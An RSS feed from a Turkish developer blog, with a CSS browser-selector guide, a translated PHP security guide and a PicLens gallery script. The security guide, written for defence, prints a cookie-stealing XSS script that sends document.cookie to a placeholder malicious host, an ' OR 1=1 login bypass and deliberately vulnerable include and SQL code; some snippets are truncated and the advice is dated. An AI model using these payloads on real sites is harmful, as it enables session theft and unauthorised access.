<?xml version="1.0" encoding="utf-8"?> <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" ><channel><title>Muzaffer AKYIL (Victorious) &#187; PHP</title> <atom:link href="http://muzaffer.akyil.net/category/makale/yazilim/php/feed" rel="self" type="application/rss+xml" /><link>http://muzaffer.akyil.net</link> <description></description> <lastBuildDate>Tue, 08 Mar 2011 09:18:58 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=</generator> <item><title>CSS Browser Selector</title><link>http://muzaffer.akyil.net/2010/04/08/makale/yazilim/php/admin/css-browser-selector.aspx</link> <comments>http://muzaffer.akyil.net/2010/04/08/makale/yazilim/php/admin/css-browser-selector.aspx#comments</comments> <pubDate>Thu, 08 Apr 2010 08:27:42 +0000</pubDate> <dc:creator>Muzaffer Ali AKYIL</dc:creator> <category><![CDATA[JavaScript]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[Yazılım]]></category> <category><![CDATA[box]]></category> <category><![CDATA[chrome]]></category> <category><![CDATA[css]]></category> <category><![CDATA[css hack]]></category> <category><![CDATA[ff]]></category> <category><![CDATA[html]]></category> <category><![CDATA[ie]]></category> <category><![CDATA[seçici]]></category> <category><![CDATA[selector]]></category> <category><![CDATA[stil]]></category> <category><![CDATA[style]]></category><guid isPermaLink="false">http://muzaffer.akyil.net/2010/04/08/makale/yazilim/php/admin/css-browser-selector.aspx</guid> <description><![CDATA[Web tasarım işi ile uğraşanların en büyük sıkıntısı CSS kodlarının her tarayıcıda, hatta aynı tarayıcının farklı versiyonlarında bile değişik yorumlanması sonucunda tasarımcıyı çıldırtmasıdır. Güncellemeler 02 Kasım 2010 (v0.4.0) Bir sayfa tasarlamaya başladığımızda favori kullandığımız tarayıcı ile tasarlarız. W3C standartlarına uygun tasarladığımız sayfalar bile bazı tarayıcılarda sorunlu görünmektedir. Bunun sebebi CSS stil kodlarının yorumlanmasının tarayıcıdan tarayıcıya [...]]]></description> <content:encoded><![CDATA[<p>Web tasarım işi ile uğraşanların en büyük sıkıntısı CSS kodlarının her tarayıcıda, hatta aynı tarayıcının farklı versiyonlarında bile değişik yorumlanması sonucunda tasarımcıyı çıldırtmasıdır.</p><blockquote><p><strong><span style="color: #ff0000;">Güncellemeler</span></strong></p><p>02 Kasım 2010 (v0.4.0)</p></blockquote><p><span id="more-239"></span></p><p>Bir sayfa tasarlamaya başladığımızda favori kullandığımız tarayıcı ile tasarlarız. <a href="http://www.w3.org/" target="_blank" class="liexternal previewlink">W3C</a> standartlarına uygun tasarladığımız sayfalar bile bazı tarayıcılarda sorunlu görünmektedir. Bunun sebebi CSS stil kodlarının yorumlanmasının tarayıcıdan tarayıcıya farklılık göstermesidir. Tasarımcılar bu sorunu her tarayıcı için farklı CSS stilleri yazarak çözmeye çalışırlar. Bu yöntemlerin genel adına CSS Hack denir.</p><p><a href="http://www.google.com/search?q=css+hack" target="_blank" class="liexternal previewlink">CSS Hack</a> işlemleri sırasında hazırladığımız CSS stillerini farklı dosyalarda tutmak, her tarayıcı için farklı yöntemler, comment&#8217;ler uygulamak bazen sıkıcı ve karışıklık meydana getirebilir.</p><p>Başlıkta bahsettiğimiz <a href="http://rafael.adm.br/" target="_blank" class="liexternal previewlink">Rafael Lima</a> tarafından yazılan ve <a href="http://creativecommons.org/licenses/by/2.5/" target="_blank" class="liexternal previewlink">Creative Commons</a> lisansla dağıttığı bu JavaScript kod ile CSS Hack işlemleri çok daha kolay hale getirilmiş.</p><p><a href="http://rafael.adm.br/css_browser_selector/" target="_blank" class="liexternal previewlink">CSS Browser Selector</a> JS koduna <a href="http://rafael.adm.br/css_browser_selector/" target="_blank" class="liexternal previewlink">resmi sitesinden</a> ulaşabilir, örnekleri görebilirsiniz.</p><p>Kodun kullanımı çok basit, yapmanız gereken JS kodu sayfanıza çağırmak ve yazacağınız CSS kodlarında kullanılacak tarayıcı ve işletim sistemleri belirlemek.</p><h5>Kodu sayfanıza eklemek ;</h5><p>&lt;head&gt; &lt;/head&gt; tagları arasında herhangi bir yere aşağıdaki kodu eklemeniz yeterli ;</p><pre class="brush: html; ">
&lt;script src=&quot;css_browser_selector.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;
</pre><h5>CSS içinde kullanımı ;</h5><pre class="brush: css; ">
html.gecko div#header { margin: 1em; }
.opera #header { margin: 1.2em; }
.ie .mylink { font-weight: bold; }
.mac.ie .mylink { font-weight: bold; }
.[os].[browser] .mylink { font-weight: bold; } /* .[os] ile .[browser] arasında boşluk yok */
</pre><h5>Kullanılabilen İşletim Sistemi Kodları ;</h5><p>win &#8211; Microsoft Windows<br /> <ins datetime="02.11.2010" cite="v0.4.0">vista &#8211; Microsoft Windows Vista</ins><br /> linux &#8211; Linux (x11 ve linux)<br /> mac &#8211; Mac OS<br /> freebsd &#8211; FreeBSD<br /> ipod &#8211; iPod Touch<br /> iphone &#8211; iPhone<br /> webtv &#8211; WebTV<br /> <del datetime="02.11.2010" cite="0.4.0">mobile &#8211; J2ME Devices (ör: Opera mini)</del><br /> <ins datetime="02.11.2010" cite="v0.4.0">j2me &#8211; J2ME Devices (ex: Opera mini)<br /> blackberry &#8211; BlackBerry<br /> android &#8211; Google Android<br /> mobile &#8211; Tüm mobil cihazlar</ins></p><h5>Kullanılabilen Tarayıcı Kodları ;</h5><p>ie &#8211; Internet Explorer (Tüm Sürümler)<br /> ie8 &#8211; Internet Explorer 8.x<br /> ie7 &#8211; Internet Explorer 7.x<br /> ie6 &#8211; Internet Explorer 6.x<br /> ie5 &#8211; Internet Explorer 5.x<br /> gecko &#8211; Mozilla, Firefox (Tüm Sürümler), Camino<br /> ff2 &#8211; Firefox 2<br /> ff3 &#8211; Firefox 3<br /> ff3_5 &#8211; Firefox 3.5<br /> <ins datetime="02.11.2010" cite="v0.4.0">ff3_6 &#8211; Firefox 3.6</ins><br /> opera &#8211; Opera (Tüm Sürümler)<br /> opera8 &#8211; Opera 8.x<br /> opera9 &#8211; Opera 9.x<br /> opera10 &#8211; Opera 10.x<br /> konqueror &#8211; Konqueror<br /> webkit or safari &#8211; Safari, NetNewsWire, OmniWeb, Shiira, Google Chrome<br /> safari3 &#8211; Safari 3.x<br /> chrome &#8211; Google Chrome<br /> iron &#8211; SRWare Iron</p><h5>Diğer dillerde benzer CSS seçicileri ;</h5><p><a href="http://latimes.rubyforge.org/svn/plugins/css_browser_selector/" target="_blank" class="liexternal previewlink">Ruby on Rails Plugin by Reid MacDonald</a></p><p><a href="http://bastian-allgeier.de/css_browser_selector/" target="_blank" class="liexternal previewlink">PHP CSS Browser Selector by Bastian Allgeier</a></p><p><a href="http://wordpress.org/extend/plugins/browser-specific-css/" target="_blank" class="liwp previewlink">WordPress Plugin by Adrian hanft</a></p> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fmuzaffer.akyil.net%2F2010%2F04%2F08%2Fmakale%2Fyazilim%2Fphp%2Fadmin%2Fcss-browser-selector.aspx&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe><img class="colorbox-239"  src="http://muzaffer.akyil.net/?ak_action=api_record_view&id=239&type=feed" alt="" />]]></content:encoded> <wfw:commentRss>http://muzaffer.akyil.net/2010/04/08/makale/yazilim/php/admin/css-browser-selector.aspx/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>PHP Güvenlik Kılavuzu</title><link>http://muzaffer.akyil.net/2009/02/20/makale/yazilim/php/admin/php-guvenlik-kilavuzu.aspx</link> <comments>http://muzaffer.akyil.net/2009/02/20/makale/yazilim/php/admin/php-guvenlik-kilavuzu.aspx#comments</comments> <pubDate>Fri, 20 Feb 2009 11:47:27 +0000</pubDate> <dc:creator>Muzaffer Ali AKYIL</dc:creator> <category><![CDATA[Güvenlik]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[arı]]></category> <category><![CDATA[ddos]]></category> <category><![CDATA[injection]]></category> <category><![CDATA[okan]]></category> <category><![CDATA[SQL]]></category><guid isPermaLink="false">http://muzaffer.akyil.net/?p=145</guid> <description><![CDATA[Çok değerli arkadaşım Okan Arı&#8216;nın PHP ve Güvenlik üzerinde derlediği Türkçeye çevirdiği bir metni sizinle paylaşmak istedim. Buyrun bakalım ; Giriş PHP, bir çok yazılım dilinden farklı olarak, buffer-overflows gibi hafıza problemleri olan, bundan dolayı güvenlik problemine neden olabilecek bir dil değildir. Aynı zamanda PHP öğrenilmesi kolay ve hızlı bir dildir. Bu kolay ve hızlı [...]]]></description> <content:encoded><![CDATA[<p>Çok değerli arkadaşım <a href="http://www.okanari.com" target="_blank" class="liexternal previewlink">Okan Arı</a>&#8216;nın PHP ve Güvenlik üzerinde derlediği Türkçeye çevirdiği bir metni sizinle paylaşmak istedim.<br /> <span id="more-145"></span><br /> Buyrun bakalım ;</p><p><strong>Giriş</strong></p><p>PHP, bir çok yazılım dilinden farklı olarak, buffer-overflows gibi hafıza problemleri olan, bundan dolayı güvenlik problemine neden olabilecek bir dil değildir. Aynı zamanda PHP öğrenilmesi kolay ve hızlı bir dildir. Bu kolay ve hızlı öğrenilebilirlik, bu dili bir çok kişinin öğrenmesine, aynı hızda üretim yaparak uygulama geliştirmesine de olanak sağlamaktadır. Ancak bu durum, bilinsizce yapılan kodlama teknikleri nedeniyle kendi içerisince ciddi bir güvenlik problemini yanında getirmektedir.<br /> Bu klavuz size, online güvenlik, web tabanlı yazılım geliştirirken PHP’de temel güvenliği nasıl sağlayacağınız konusunda fikir vermek için hazırlanmıştır. Klavuz içerisinde başlangıç seviyesi kullanıcılar için önemli bilgiler, uzmanlar için belki de gözden kaçan ufak ipuçları bulunabilir.<br /> <strong><br /> Atak Tipleri:</p><p>XSS Atağı:</strong><br /> XSS &#8220;Cross Site Scriptting&#8221; anlamında kullanılmaktadır ve bir sayfaya içerik girmek -JavaScript gibi- gibi düşünebiliriz. XSS atakları genelde kullanıcının Cookie (çerez) lerini çalmak amacıyla kullanılır. Bu cookie’ler kullanıcı login bilgileri, sişreleri ya da benzeri önemli bilgileri içeriyor olabilir.</p><p>Basit anlamda bir örnek verelim.</p><pre class="brush: php; ">

$id=$_GET[&#039;id&#039;];
echo &quot;Gelen ID degeri:&quot;.$id;
</pre><p>Yukarıdaki kodda, $_GET[’id’] degiskeni bir sayı ise problem yok. Ancak ya aşağıdaki gibi bir kodsa?</p><pre class="brush: js; ">

&lt;script&gt;
window.location.href = &quot;http://kotuamaclisite.com/cookie-calanscript.php?c=&#039; + document.cookie;
&lt;/script&gt;
</pre><p>Kullanıcı bir sekilde, bu kotu amaçlı kodu çalıştırırsa, tüm cookie bilgilerini kotü amaçlı siteye devredebilir.</p><p><strong>XSS Ataklarından Nasıl Korunurum?</strong></p><p>İlk olarak, asla kullanıcı girişi bilgilerine güvenmeyiniz. Kullanıcılardan girilen her bilgiyi mutlaka kontrol edip filtrelememiz gerekiyor. Yani gelen kullanıcı bilgilerini HTML tag’lerinden arındırırsak bir JavaScript kodu çalıştırılamak hale getirebiliriz. Bunu yapmanın en kolay yolu PHP’nin strip_tags() fonksiyonunu kullanmaktır. Bu fonksiyon tüm HTML tag’lerini temizleyecektir. HTML tag’lerini silmemek ama onları zararsız hale getirmk için htmlentities() fonksiyonunu da kullananilirsiniz. Bu fonksiyon, < ve > karakterlerini < ve >karakterlerine dönüştürecektir.</p><p><strong>SQL Injection Yönetemi:</strong></p><p>Günümüzde bir çok web sitesi verileri barındırmak için veritabanı kullanmaktadır. Bu bağlamda veritabanına girmek için bir çok INSERT, UPDATE ve SELECT işlemleri yapılmaktadır. Buna rağmen bir çok site, form verileri açısında SQL Injection yöntemi ile atağa uğramak konusunda yeterli güvenliğe sahip değildir.</p><p>SQL Injection, değiştirilmiş, atak için düzenlenmiş form içerikleri ile yapılan veritabanı sorgularıdır. Bu ataklar veritabanınızdan bir kaç veriyi çalmak, izinsiz login olmak, ya da tüm veritabanını silmek gibi sonuçları doğurabilir.</p><p>En genel kullanımı anlatmak için aşağıdaki kod örneğine bakalım:</p><pre class="brush: php; ">

site_users
WHERE
username = &#039;$username&#039;
AND
password = &#039;$password&#039;
&quot;);

if ( mysql_num_rows($result) &gt; 0 )
// login oldu
</pre><p>Yukarıdaki kod örneği, SQL Injection için gerekli ortamı hazırlamaktadır, bu konuda zaafiyet oluştrabilecek bir kod örneğidir. Kötü amaçlı bir kişi yukarıdaki SQL&#8217;i değiştirerek sisteme izinsiz giriş yapabilir. (Kullanıcı şifresini girmeden login olabilir)</p><p>Örneğin kötü kullanıcı (saldırgan) kullanıcı adı alanına &#8220;rob&#8221; şifre (password) alanına aşağıdaki gibi bir giriş yaparsa:</p><p>&#8216; OR 1=1 &#8216;</p><p>Yukarıdaki kod şu şekli alır:</p><pre class="brush: sql; ">

SELECT *
FROM
site_users
WHERE
username = &#039;rob&#039;
AND
password = &quot; OR 1=1
</pre><p>Bu SQL sorgusu ise, kullanıcı adı &#8220;rob&#8221; olan kaydın şifresi ne olursa olsun getirmektedir. Yani şifre kontrolu gerçekleşememiştir.</p><p><strong>SQL Injection Atağından Nasıl Korunurum?</strong></p><p>XSS Atağında olduğu gibi, en büyük sorun kullanıcının gönderdiği veriyi olduğu gibi kullanmaktır. Korunmanın en iyi yöntemi ise, kullancıı verisini riskli karakterlerden arındırmaktır. mysql_real_escape_string() fonksiyonu bu amaçla PHP içerisinde yer alıyor. Bu fonksiyon riskli olan &#8216; ve &#8221; gibi karakterleri temizlemektedir. Ayrıca, SQL sorgularınızda kullandığınız kullancıı verileri, eğer, sayı olmanı bekleniyorsa intval() fonksiyonu ile gelen verinin sadece sayı bilgisi olan kısmı alınmalıdır.</p><p><strong>Dosya Yüklemesi Atağı (File Upload)</strong></p><p>Kullancıların yükledikleri dosyalar en büyük güvenlik risk unsurlarının başında gelmektedir. Bu, tanımadığınzı bilmediğiniz dosyaları sunucunuzda barındırmak anlamındadır. Bu dosyalar, dosyalarınız silmek için, veri tabanınızı boşaltmak için olabilir. Ya da daha başka bir çok güvenlik problemine neden açabilecek dosyalar olabilir.</p><p>Buna rağmen, güvenli şekilde dosya almak kontrol içerisinde alındığında mümkündür.</p><p>Kullanıcıların sisteminize dosya yüklemesine izin verdiğiniz durumlarda, kontrol etmeniz gereken 2 önemli bilgi mevcuttur.</p><p>Birincisi, dosyanın &#8220;mime-type&#8221; ıdır. Yani, dosyanın header’ında bulunan ve dosya tipini belirten bölüm. Örneğin kullanıcının sadece resim dosyası upload etmesini istiyorsanız yüklenen dosyanın &#8220;mime-type&#8221; ı image/png, image/jpeg, image/gif, image/x-png ya da image/p-jpeg olmalıdır. Aşağıdaki kod bu kontrolü gerçekleştirir.</p><pre class="brush: php; ">

$validMimes = array(
&#039;image/png&#039;,
&#039;image/x-png&#039;,
&#039;image/gif&#039;,
&#039;image/jpeg&#039;,
&#039;image/pjpeg&#039;
);

$image = $_FILES[&#039;image&#039;];

if(!in_array($image[&#039;type&#039;], $validMimes)) {
die(&#039;Üzgünüm, izin verilmeyen dosya tipi.&#039;);
}

// İşlem tamam yüklemeyi gerçekletir vs vs.
</pre><p>İkinci kontrol etmeniz gereken bilgi ise, dosyanın uzantısıdır. Zira, mime-type bilgisi manuple edilebilir bir bilgidir. Bu bağlamda dosyanın uzantısını kontrol etmeniz gerekir. Zira bir kullanıcı, bir imaj dosyasının mime-type ı ile bir PHP dosyası gönderebilir. Bu durumda siz bir PHP dosyasını sisteminize almış olursunuz ki bu çok ciddi bir risk faktörüdür.</p><p>Bu durumdan korunmak için, sisteminize yüklediğiniz dosyaların uzantıları, siz tanımlamalısınız. Bu tanımlamayı ise mime-type bilgise göre yapabilirsiniz. Aşağıdaki örneğe bakalım:</p><pre class="brush: php; ">

$validMimes = array(
&#039;image/png&#039; =&gt; &#039;.png&#039;,
&#039;image/x-png&#039; =&gt; &#039;.png&#039;,
&#039;image/gif&#039; =&gt; &#039;.gif&#039;,
&#039;image/jpeg&#039; =&gt; &#039;.jpg&#039;,
&#039;image/pjpeg&#039; =&gt; &#039;.jpg&#039;
);

$image = $_FILES[&#039;image&#039;];

if(!array_key_exists($image[&#039;type&#039;], $validMimes)) {
die(&#039;Üzgünüm, izin verilmeyen dosya tipi.&#039;);
}

// Dosya uzantısını barındırmayan dosya adını alalım:
$filename = substr($image[&#039;name&#039;], 0, strrpos($image[&#039;name&#039;], &#039;.&#039;));

// Mime type göre dogru uzantıyı verelim
$filename .= $validMimes[$image[&#039;type&#039;]];

// İşlem tamam
</pre><p>Yukarıdaki örnekle, bir PHP dosyanının sanki bir resim dosyasıymış gibi sisteminize PHP dosyası olarak yüklenmesini engellediniz. Dosya mime-type’ı PNG’yi işaret ediyorsa, dosya uzantısı .png olacaktır.</p><p><strong>Dosya Include Atağı:</strong></p><p>Kullanımı çok yaygın olan index.php?sayfa=xxxx.php şeklideki dosya include yöntemi çok ciddi risk taşıyabilir. Bu kullanım genelde, menü yapısı, logo gibi bölümleri index.php ye kaydedip içerik bölümünü başka dosyalarda saklayarak site yönetimini kolaylaştırmak için kullanılır. Bu durumdaki yanlışlık,</p><pre class="brush: php; ">

include $_GET[&#039;sayfa&#039;];
</pre><p>gibi bir kod ile gelen değişkene göre sayfayı include etmektendir.</p><p>Yukaridaki kullanımda PHP’nin allow_url_fopen ayarı ON durumda ise, yani aktifse, saldırgan başka bir sunucudaki dosyayı sitenize include edebiliyor demektir. Kodunuz da echo file_get_contents() değil de include kullanıdığı için bu çok sık karşılaşılan bir açığa sebebiyet vermektedir. Bu durum, sunucunuzun tüm kontrolünü saldırgana bırakmak demektir.</p><p>Bu durumdan yapabileceğiniz 2 şey vardır.</p><p>Birincisi, bir liste oluşturup gelen değişkeni burada kontrol etmektir. Örneğin şöyle bir kod ile:</p><pre class="brush: php; ">

switch($_GET[&#039;sayfa&#039;]) {
case &quot;hakkimizda&quot;:
include(&#039;hakkimizda.php&#039;);
break;
case &quot;haberler&quot;:
include(&#039;haberler.php&#039;);
break;
default:
include(&#039;anasayfa.php&#039;);
}
</pre><p>Bu kod ile include edebileceğiniz her sayfayı belirtiyor ve belirtmediğiniz sayfa için anasayfa.php dosyasını include ediyorsunuz. Bu yöntemin zor tarafı, ekleyeceğiniz her sayfayı bu listeye de eklemek zorunluluğudur.</p><p>İkinci bir yöntem ise, dışarodan gelen $_GET['sayfa'] değişkenini kontrol etmek ve temizlemektir.</p><pre class="brush: php; ">

$sayfa = preg_replace(&#039;/\W/si&#039;, &#039;&#039;, $_GET[&#039;sayfa&#039;]);

include(&#039;./&#039;.$sayfa.&#039;.php&#039;);
</pre><p>Yukarıdaki kod, &#8220;..&#8221;, &#8220;/&#8221; gibi karakterleri temizleyerek kullanıcının 212.111.111.111 gibi ip ya da http://www.kotusite.com gibi domain belirtmesini engeller. Bu verileri 212111111111, httpwwwkotusitecom şekline çevirir.</p><p>Dosya include atağındaki diğer bir açık ise, include edilen dosyaların uzantılarını .inc gibi sunucunun tanımayacağı bir uzantı yapmaktır. Örneğin, config.inc gibi bir dosya yapıp bunu include etmek çok sakıncalı olabilir. Zira, saldırgan bu dosyanın adını ve yerini öğrendiğinde, eğer web suncuunuz bu dosyayı çalıştırabilir bir dosya olarak tanımıyorsa (ki tanımama ihtimali yüksektir), saldırdan dosya içeriğini görecektir. Bu durumda yapabileceğiniz, her türlü dosya uzantınızı .php yapmaktır. Boylece saldırgan bu dosyaların içeriğini görüntüleyemez. Diğer bir yöntem ise Apache sunucular için, aşağıdaki gibi bir .htaccess dosyası olusturarak .inc dosyalarının ulaşılmasını engelleyebilirsiniz.</p><pre class="brush: c; ">

&lt;files ~ &quot;\.inc$&quot;&gt;
Order allow,deny
Deny from all
&lt;/files&gt;
</pre><p><strong>Register Globals Atağı:</strong></p><p>register_globals değeri PHP ayarında ON durumda ise, $_POST, $_GET, $_SERVER, $_COOKIE, $_REQUEST, $_FILE ile gelen değişkenlere global değişkenler olarak ulaşabilirsiniz. Yani mesela $_POST[’mesaj’] değişkenine $mesaj olarak ulaşabilirsiniz.</p><p>register_globals değeri güncel PHP kurulumlarında varsayılan olarak OFF durumdadır. Ancak eski bir PHP kurulumu bulunan sunucuda, ya da sistem yönetici tarafından özellikle açılmış bir sunucuda ON durumunda olabilir (ki paylaşımlı hosting firmaları geçmiş müşterilerinin kodlarının uyumu adına açabiliyorlar).</p><p>register_globals’in ON olamsı durumu için aşağıdaki kodu inceleyelim.</p><p>dosya.php dosyası örneği:</p><pre class="brush: php; ">

if($_POST[&#039;username&#039;] == &#039;rob&#039; &amp;&amp; $_POST[&#039;password&#039;] == &#039;foo&#039;) {
$authenticated = true;
}

if($authenticated) {
// giriş başarılı bişeyler yapalım
}
</pre><p>Saldırgan, dosya.php?authenticated=true şeklinde bir URL çağrımı ile, sisteme izinsiz giriş yapabilir.</p><p>Bu durumda ne yapacağız, register_globals değerini OFF yapamayabileceğimiz durumların her zaman gerçekleşebileceğini düşünerek, kodumuzu şu şekilde değiştirelim.</p><pre class="brush: php; ">

$authenticated = false;

if($_POST[&#039;username&#039;] == &#039;rob&#039; &amp;&amp; $_POST[&#039;password&#039;] == &#039;foo&#039;) {
$authenticated = true;
}

if($authenticated) {
// giriş başarılı bişeyler yapalım
}
</pre><p>Bu kod, $authenticated değişkenini sayfa başında false yapmaktadır. $_POST&#8217;tan gelen veri eğer uygunsa $authenticated true yapılır. Böylece, dışarıdan gönderilen değişken ile izinsiz giriş yaplıması engellenmiş olur.</p><p>Derleme ve Çeviri : <a href="http://www.okanari.com" target="_blank" class="liexternal previewlink">Okan ARI</a></p> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fmuzaffer.akyil.net%2F2009%2F02%2F20%2Fmakale%2Fyazilim%2Fphp%2Fadmin%2Fphp-guvenlik-kilavuzu.aspx&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe><img class="colorbox-145"  src="http://muzaffer.akyil.net/?ak_action=api_record_view&id=145&type=feed" alt="" />]]></content:encoded> <wfw:commentRss>http://muzaffer.akyil.net/2009/02/20/makale/yazilim/php/admin/php-guvenlik-kilavuzu.aspx/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>PicLens XML Parser for ImageVue Image Gallery</title><link>http://muzaffer.akyil.net/2008/09/24/makale/yazilim/php/admin/piclens-xml-parser-for-imagevue-image-gallery.aspx</link> <comments>http://muzaffer.akyil.net/2008/09/24/makale/yazilim/php/admin/piclens-xml-parser-for-imagevue-image-gallery.aspx#comments</comments> <pubDate>Wed, 24 Sep 2008 06:58:05 +0000</pubDate> <dc:creator>Muzaffer Ali AKYIL</dc:creator> <category><![CDATA[Internet]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[cooliris]]></category> <category><![CDATA[dirlist]]></category> <category><![CDATA[galeri]]></category> <category><![CDATA[imagevue]]></category> <category><![CDATA[piclens]]></category> <category><![CDATA[rss]]></category> <category><![CDATA[xml]]></category><guid isPermaLink="false">http://muzaffer.akyil.net/?p=116</guid> <description><![CDATA[Evet arkadaşlar uzun süredir bişiler karalamıyordum. Bu aralar işler baya yoğun. Geçenlerde çektiğim bazı fotoğrafları yayınlamak için bir galeri arayışına girdim. ImageVue ile tanıştım. Gayet başarılı bir galeri. Bu galeri yazılımını kullanarak kendi galerimi oluşturdum. Sonrasında Sağlam bir Firefox kullanıcısı olduğumdan Firefox eklentisi olan PicLens ile galeriyi entegre etmeye çalıştım. Ve sonuç olarak aşağıdaki kodlar [...]]]></description> <content:encoded><![CDATA[<p>Evet arkadaşlar uzun süredir bişiler karalamıyordum. Bu aralar işler baya yoğun. Geçenlerde çektiğim bazı fotoğrafları yayınlamak için bir galeri arayışına girdim. <a href="http://imagevuex.com/" target="_blank" class="liexternal previewlink">ImageVue</a> ile tanıştım. Gayet başarılı bir galeri. Bu galeri yazılımını kullanarak <a href="http://muzaffer.akyil.net/galeri" target="_blank" class="liinternal">kendi galerimi</a> oluşturdum. Sonrasında Sağlam bir <a href="http://www.mozilla.org" target="_blank" class="liexternal previewlink">Firefox </a>kullanıcısı olduğumdan Firefox eklentisi olan <a href="http://www.cooliris.com/" target="_blank" class="liexternal previewlink">PicLens</a> ile galeriyi entegre etmeye çalıştım. Ve sonuç olarak aşağıdaki kodlar meydana çıktı.<span id="more-116"></span></p><p>Öncelikle PicLens fotograflarımızın küçük hallerini ve büyük hallerini bir <strong>RSS (XML)</strong> içinde toplamamızı istiyor ve bu topladığımız bilgileri <strong>photos.rss</strong> adı aldında galerinin bulunduğu ana klasörde bulundurmamız gerekiyor. Aşağıda yazdığım php kodu galerimizin bulunduğu klasörler içindeki fotolarmızı araştırıp XML haline getiriyor. Bilindiği üzere <strong>RSS</strong> uzantısı <strong>text/plain</strong> bir uzantıdır. Öncelikle rss uzantısı ile php çalıştıracağımızı Apache Web Sunucusu yazılımına bildirmemiz gerekli. Bu sebepten galerinin kök dizinine .htaccess diye bir dosya oluşturup içine aşağıdaki kodu yazıyoruz.</p><p><strong>.htaccess içeriği</strong></p><pre class="brush: c; ">

AddType application/x-httpd-php .rss
</pre><p>Daha sonrasında aşağıdaki kodları photos.rss dosyasını oluşturarak içine yapıştırıyoruz.</p><p><strong>photos.rss içeriği</strong></p><pre class="brush: php; ">

/*
PicLens XML Parser for ImageVue Image Gallery
Coder by Victorious
Web : http://muzaffer.akyil.net &amp; Gallery : http://muzaffer.akyil.net/galeri
*/

//Tanımlar
$title = &quot;Muzaffer AKYIL - Photographer&quot;; //Sayfa Başlığı
$desc = &quot;Muzaffer AKYIL Photographer&quot;; //Sayfa Açıklaması
$link = &quot;http://muzaffer.akyil.net/galeri/&quot;; //Sayfa Linki
$klasor = &quot;./content&quot;; //Fotoğrafların Bulunduğu Klasör
// Tanım Sonu

header(&quot;Content-Type: application/xml; charset=ISO-8859-9&quot;);
function ListFiles($dir) {
    if($dh = opendir($dir)) {
        $files = Array();
        $inner_files = Array();
        while($file = readdir($dh)) {
            if($file != &quot;.&quot; &amp;&amp; $file != &quot;..&quot; &amp;&amp; $file[0] != &#039;.&#039;) {
                if(is_dir($dir . &quot;/&quot; . $file)) {
                    $inner_files = ListFiles($dir . &quot;/&quot; . $file);
                    if(is_array($inner_files)) $files = array_merge($files, $inner_files);
                } else {
				if(substr($file,-3) == &#039;jpg&#039; || substr($file,-3) == &#039;JPG&#039;){
					if(substr($file,0,2)!=&#039;tn&#039;) {
                    	array_push($files, $dir . &quot;/tn_&quot; . $file);
					}
				}
                }
            }
        }
        closedir($dh);
        return $files;
    }
}
echo &#039;&lt; ?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; standalone=&quot;yes&quot;?&gt;
&lt;rss version=&quot;2.0&quot; xmlns:media=&quot;http://search.yahoo.com/mrss&quot; xmlns:atom=&quot;http://www.w3.org/2005/Atom&quot;&gt;
&lt;channel&gt;
&lt;title&gt;&#039;.$title.&#039;&lt;/title&gt;
        &lt;link&gt;&#039;.$link.&#039;&lt;/link&gt;
        &lt;description&gt;&#039;.$desc.&#039;&lt;/description&gt;
&#039;;
$x = 1;
foreach (ListFiles($klasor) as $key=&gt;$file){
$normal_file = str_replace(&quot;tn_&quot;,&quot;&quot;,$file);
$thumb = $file;
echo &quot;&lt;item&gt;
                &lt;title&gt;$x&lt;/title&gt;
                &lt;link&gt;$file&lt;/link&gt;
                &lt;guid&gt;$x&lt;/guid&gt;
                &lt;media :thumbnail url=\&quot;$thumb\&quot; /&gt;
                &lt;media :content url=\&quot;$normal_file\&quot; type=\&quot;image/jpeg\&quot; /&gt;
        &lt;/item&gt;&quot;;
$x = $x + 1;
}
echo &#039;&lt;/channel&gt;
&lt;/rss&gt;&#039;;
</pre><p>Son olarak photos.rss içindeki Tanımlar bölümündeki bilgileri kendi galerimize göre değiştiriyoruz.</p><p>Artık galerinizin ana sayfasına girip PicLens butonuna tıklayabilirsiniz.</p><p>Kolay Gelsin.</p> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fmuzaffer.akyil.net%2F2008%2F09%2F24%2Fmakale%2Fyazilim%2Fphp%2Fadmin%2Fpiclens-xml-parser-for-imagevue-image-gallery.aspx&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe><img class="colorbox-116"  src="http://muzaffer.akyil.net/?ak_action=api_record_view&id=116&type=feed" alt="" />]]></content:encoded> <wfw:commentRss>http://muzaffer.akyil.net/2008/09/24/makale/yazilim/php/admin/piclens-xml-parser-for-imagevue-image-gallery.aspx/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Kısayoldan SQL Tablo Tasarımı</title><link>http://muzaffer.akyil.net/2007/04/12/makale/yazilim/php/admin/kisa-yoldan-sql-tablo-tasarimi.aspx</link> <comments>http://muzaffer.akyil.net/2007/04/12/makale/yazilim/php/admin/kisa-yoldan-sql-tablo-tasarimi.aspx#comments</comments> <pubDate>Thu, 12 Apr 2007 19:17:37 +0000</pubDate> <dc:creator>Muzaffer Ali AKYIL</dc:creator> <category><![CDATA[Internet]]></category> 